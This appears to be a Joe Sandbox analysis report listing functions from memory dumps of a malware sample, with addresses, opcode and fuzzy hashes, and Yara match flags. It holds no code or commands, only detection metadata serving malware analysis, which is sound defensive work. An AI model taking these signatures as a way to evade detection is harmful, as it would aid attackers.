                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5e074d498d349d20c17923ebbca61cde330de8c03f771f91164867053bffb89f
                                                                                                                                                                                                                                        • Instruction ID: 3091657ee4cced5851ca4dbba440f74af0969c41cbc5f8964205a207b597f97a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e074d498d349d20c17923ebbca61cde330de8c03f771f91164867053bffb89f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5771BAB450D3E08AE7358F25A59839BBFE1AFA3304F584A5DD0D90B392C735440ACB9B
                                                                                                                                                                                                                                        Function 0211DF17 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0462499cb7a09d73976aa631a93025f0bedcc576adcecb187d2c9b365651266e
                                                                                                                                                                                                                                        • Instruction ID: 538e1fcf9e34a776e355de986d290594f4929847e6241ace0613d19ae4073768
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0462499cb7a09d73976aa631a93025f0bedcc576adcecb187d2c9b365651266e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14617C37789E804BE72C8D7D5C5126ABA834BD7234B2EC77DE9B5873E5DA7448028380
                                                                                                                                                                                                                                        Function 0041DCB0 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0462499cb7a09d73976aa631a93025f0bedcc576adcecb187d2c9b365651266e
                                                                                                                                                                                                                                        • Instruction ID: 4a8760de8a520384406f5fad9824bc60f729446c1310b2ee7c15e8b6ebb7b759
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0462499cb7a09d73976aa631a93025f0bedcc576adcecb187d2c9b365651266e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5616E37B49A8047E72C8D3C5C5129ABA834BD7330B2DC77EE5B58B3E5D9A94C424345
                                                                                                                                                                                                                                        Function 0211A8F7 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d937ac78293dbcfc8f2158b33ba3ca81f483dbea9d3a0e83d79815296469ed2d
                                                                                                                                                                                                                                        • Instruction ID: 4b218b494f34aec14f30f12a475bd2ffe4b1672959af377b0aa99c31ddfec2b2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d937ac78293dbcfc8f2158b33ba3ca81f483dbea9d3a0e83d79815296469ed2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3161C537B6A9D04B97288A3C5C512AA7E530FD723472EC376A9B5DB3E5C7354805C390
                                                                                                                                                                                                                                        Function 0212BE07 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
                                                                                                                                                                                                                                        • Instruction ID: 93284dbe2e4f613002e006171a75de95e6f8ca45c22de7bb2a2662484573d191
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7161D23164C2604BD7249E2D888032EF7D2AF86738F2A872DF6B48B3E5D73199598745
                                                                                                                                                                                                                                        Function 0042BBA0 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
                                                                                                                                                                                                                                        • Instruction ID: 8f9bf87213cc9725e7ca00057ce5f8087594d7d424e623d20a35489e4cd6523a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3861EA317186254BD7249D2DE8C026BB7D2EBC5330F99872EE4B49B3E5D7389C418789
                                                                                                                                                                                                                                        Function 0211B6EB Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 50e165b6bb7c753b88c47e3f014378d88afe1eccc8203488f2895be52c8ee4ce
                                                                                                                                                                                                                                        • Instruction ID: fd89e6e77ab9204fff1b7301b4483ea47747b8b49bff87db66404a2d963f4dae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50e165b6bb7c753b88c47e3f014378d88afe1eccc8203488f2895be52c8ee4ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2413A766587814BD3298A35C862773BFA3AFA3308F1C947DC4D38B656DB39A10B8710
                                                                                                                                                                                                                                        Function 0041B484 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7f4536cca71d1d420f26cfe0a42acfad6fc09b98fb4c506e7ec207e1e3710ef5
                                                                                                                                                                                                                                        • Instruction ID: 00f4e2759825dcf10c6fc0e57a4f65ea5fa50f8fe0cbaea4274dafa2f605c2a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f4536cca71d1d420f26cfe0a42acfad6fc09b98fb4c506e7ec207e1e3710ef5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA4128726147414BD3298B35C8A23B3BBA3EBA6304F1C846EC4D38B756DB3DA50B8754
                                                                                                                                                                                                                                        Function 0210CCC9 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7eb278277fedf1e8d52e66d84e555e82bab7541452ed5cead15742adef644b5f
                                                                                                                                                                                                                                        • Instruction ID: 81e35b3c9639f653e4b78af3b6a19cb59e4b3dfb7a7f92bcc5250c98de83f962
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7eb278277fedf1e8d52e66d84e555e82bab7541452ed5cead15742adef644b5f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E5126766483118BC718CF65C89166BB7E2FFC9304F19DA2EE4C69B390DB749801CB86
                                                                                                                                                                                                                                        Function 0040CA62 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: beb234027a56441d2e590b2ce743a9196137ad24ac020d59d7cdb2a6eb68ddef
                                                                                                                                                                                                                                        • Instruction ID: 618579726118e679aa1534d0b4440190eb114bb965ab7fb83873a39d39203c85
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: beb234027a56441d2e590b2ce743a9196137ad24ac020d59d7cdb2a6eb68ddef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E5136766083118BC718DF64D89266BB7E2FFD4304F18DA2EE4C69B390DB749801C786
                                                                                                                                                                                                                                        Function 0041B667 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3c7ccca648bacceba5ebfdb24a7e27f770f2e897686419ce5b318d0413d75915
                                                                                                                                                                                                                                        • Instruction ID: 6085e876b09a2a4ee967cc73ad16ecd698c2875847a3188e517866274535cc44
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c7ccca648bacceba5ebfdb24a7e27f770f2e897686419ce5b318d0413d75915
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E4129726547414BD32A8A35C8623B3BB93EBE2304F1C946EC4D387792D77D940B8354
                                                                                                                                                                                                                                        Function 0213AF17 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
                                                                                                                                                                                                                                        • Instruction ID: 5350e738b0a196d36946ff1cbfe237b463a01ccf3c5656d9fa89a9140fc46514
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC513CB15087548FE314DF29D89475BBBE1BBC4318F144A2DE5E987390E37AD6088F82
                                                                                                                                                                                                                                        Function 0043ACB0 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
                                                                                                                                                                                                                                        • Instruction ID: 0c6b8ba10c1c17cacf5a651755a68f3586d4d6297ac1e50e8e02080b14342633
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0515DB15087548FE314DF29D49535BBBE1BBC8318F044E2EE4E987351E379DA088B96
                                                                                                                                                                                                                                        Function 004418A0 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d9c3875382c78234133a2a0b030691dc1d9056c16a73f6806e133a01e98343d6
                                                                                                                                                                                                                                        • Instruction ID: 26aced47306ba8243eb9efc204361966fa7a7ce3dd7d84c478a3f5587c373eec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9c3875382c78234133a2a0b030691dc1d9056c16a73f6806e133a01e98343d6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC514939A08311CFD7109F64D89026AB3E1FB8A315F0D847ED48997360D339D886CB4A
                                                                                                                                                                                                                                        Function 02102477 Relevance: .2, Instructions: 176COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
                                                                                                                                                                                                                                        • Instruction ID: 1ad63d2833fcd389e14ee1a20c9ffcf4e94d522de2ff97664ec2677c5493ab0a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA51B3B19047419FD3209F28DC8871AB7A5AF85338F14473CECA9972E0E771E915CB8A
                                                                                                                                                                                                                                        Function 00402210 Relevance: .2, Instructions: 176COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
                                                                                                                                                                                                                                        • Instruction ID: 08a7e479931a5a61fa7b69175e4513341166876bb814eb369fc510c4807828e1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6651C1B19047019BD3109F389D4871BB7A4BB85338F14473DE8A9A73E1E378E915CB8A
                                                                                                                                                                                                                                        Function 02136877 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
                                                                                                                                                                                                                                        • Instruction ID: 5f0f1636741ac1ebcb5a73bd463cdadc9265b8136139558992e9a208ca8c1688
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB517C337899D05BD72D8A3C4C522667A874BE7234B2EC77EE4F5CB3E2D66588018358
                                                                                                                                                                                                                                        Function 00436610 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
                                                                                                                                                                                                                                        • Instruction ID: 54c58fb9e562efe4acf2d46a46492020a6cdaf8e3d7bcc25f04f53f15c8a0988
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 435169377499A15BD7288A3C5C222667A830BEB238F3ED76FE4B1CB3E5D55C88024345
                                                                                                                                                                                                                                        Function 0213CDA7 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
                                                                                                                                                                                                                                        • Instruction ID: e1823091626b326294abfe3b7d6e57fc6c03bc54f3121d8daf91cc083ee93afa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F651CE33E15A304BD7259D7D8C8126ABA926B86730F2A837AED75EB3D0D7349D0183C1
                                                                                                                                                                                                                                        Function 0043CB40 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
                                                                                                                                                                                                                                        • Instruction ID: 871487b85ee081f61f96075d83eee7838f6093090311bf861c268766400ad4d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6751E573E159304BD7249D7D9C8125BBA926B86330F2A833AED75EB3D0D6389D0143C5
                                                                                                                                                                                                                                        Function 021160EF Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
                                                                                                                                                                                                                                        • Instruction ID: 0b378c3cbfe096d3c88575fb66abcd29c7352c0291cafe4bd6dbcdb42f859ddf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72513CB29482815FD724CF2CC89177AB7E6AFD5214F084A7DE0DAC7292E736D905CB42
                                                                                                                                                                                                                                        Function 0213CC07 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                                        • Instruction ID: 8b6b96cede083ea36f15af2067a5aaad4563b90d44a4abde3f953a97813795d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D415971A443146FE7159F64DC80B6BBBA6EF85B04F15842DFD85A7150EB32E804CBD2
                                                                                                                                                                                                                                        Function 0043C9A0 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
